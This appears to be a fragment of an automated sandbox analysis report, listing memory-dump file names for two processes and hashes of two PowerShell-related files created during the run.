memory/3280-186-0x0000000008040000-0x00000000080A6000-memory.dmp
memory/3280-187-0x00000000080E0000-0x0000000008430000-memory.dmp
memory/3280-188-0x0000000004C72000-0x0000000004C73000-memory.dmp
memory/3280-189-0x0000000007F20000-0x0000000007F3C000-memory.dmp
memory/3280-190-0x00000000088C0000-0x000000000890B000-memory.dmp
memory/3280-191-0x0000000008750000-0x00000000087C6000-memory.dmp
memory/3280-192-0x0000000003270000-0x0000000003271000-memory.dmp
memory/3280-200-0x0000000007650000-0x0000000007C78000-memory.dmp
memory/3280-201-0x0000000009840000-0x0000000009873000-memory.dmp
memory/3280-203-0x0000000009840000-0x0000000009873000-memory.dmp
memory/3280-202-0x000000007F120000-0x000000007F121000-memory.dmp
memory/3280-205-0x0000000007DF0000-0x0000000007E56000-memory.dmp
memory/3280-204-0x00000000075F0000-0x0000000007612000-memory.dmp
memory/3280-206-0x0000000008040000-0x00000000080A6000-memory.dmp
memory/3280-208-0x0000000008750000-0x00000000087C6000-memory.dmp
memory/3280-207-0x00000000088C0000-0x000000000890B000-memory.dmp
memory/3280-209-0x0000000009610000-0x000000000962E000-memory.dmp
memory/3280-214-0x0000000009880000-0x0000000009925000-memory.dmp
memory/3280-215-0x0000000009B30000-0x0000000009BC4000-memory.dmp
memory/3280-222-0x0000000004C73000-0x0000000004C74000-memory.dmp
memory/3280-409-0x0000000009AE0000-0x0000000009AFA000-memory.dmp
memory/3280-414-0x0000000009AE0000-0x0000000009AFA000-memory.dmp
memory/3280-415-0x0000000009AD0000-0x0000000009AD8000-memory.dmp
memory/3280-420-0x0000000009AD0000-0x0000000009AD8000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 1c19c16e21c97ed42d5beabc93391fc5 |
| SHA1 | 8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68 |
| SHA256 | 1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05 |
| SHA512 | 7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c |
memory/2148-433-0x00000000071D0000-0x0000000007206000-memory.dmp
memory/2148-434-0x0000000007840000-0x0000000007E68000-memory.dmp
memory/2148-435-0x0000000004E50000-0x0000000004E51000-memory.dmp
memory/2148-436-0x0000000004E52000-0x0000000004E53000-memory.dmp
memory/2148-437-0x0000000007F70000-0x0000000007F92000-memory.dmp
memory/2148-438-0x0000000008250000-0x00000000082B6000-memory.dmp
memory/2148-439-0x0000000008070000-0x00000000080D6000-memory.dmp
memory/2148-440-0x00000000082C0000-0x0000000008610000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4dead21eadbf49fd5eb9883f0504c894 |
| SHA1 | b39d0806a2de4fa89d2e50394bcd9e02e7bebd5f |
| SHA256 | 1b526fe2bcaad9a0794d2ed8069bf860d0ac9d6184f17ef59dd41893eb4031da |
| SHA512 | e48b5b353ac29099090653a9770592e9bbb8d7eece0125ddf47f939812bcdd1fc7e98b84825de15fd01ed3713a8b966489657a6a83857a32a3f94f60374ef56a |
memory/2148-442-0x00000000086D0000-0x00000000086EC000-memory.dmp
memory/2148-443-0x0000000008B20000-0x0000000008B6B000-memory.dmp
memory/2148-444-0x00000000089C0000-0x0000000008A36000-memory.dmp
memory/2148-453-0x0000000007840000-0x0000000007E68000-memory.dmp
memory/2148-454-0x0000000009AA0000-0x0000000009AD3000-memory.dmp
memory/2148-456-0x0000000007F70000-0x0000000007F92000-memory.dmp
memory/2148-455-0x0000000009AA0000-0x0000000009AD3000-memory.dmp
memory/2148-457-0x0000000008250000-0x00000000082B6000-memory.dmp
memory/2148-458-0x0000000008070000-0x00000000080D6000-memory.dmp
memory/2148-460-0x00000000089C0000-0x0000000008A36000-memory.dmp
memory/2148-459-0x0000000008B20000-0x0000000008B6B000-memory.dmp
memory/2148-461-0x0000000009880000-0x000000000989E000-memory.dmp
memory/2148-466-0x0000000009AF0000-0x0000000009B95000-memory.dmp
memory/2148-467-0x000000007F4D0000-0x000000007F4D1000-memory.dmp
memory/2148-468-0x0000000009DA0000-0x0000000009E34000-memory.dmp
memory/2148-539-0x0000000004E53000-0x0000000004E54000-memory.dmp
memory/2148-662-0x0000000009D70000-0x0000000009D8A000-memory.dmp
memory/2148-667-0x0000000009D70000-0x0000000009D8A000-memory.dmp
memory/2148-668-0x0000000009D60000-0x0000000009D68000-memory.dmp
memory/2148-673-0x0000000009D60000-0x0000000009D68000-memory.dmp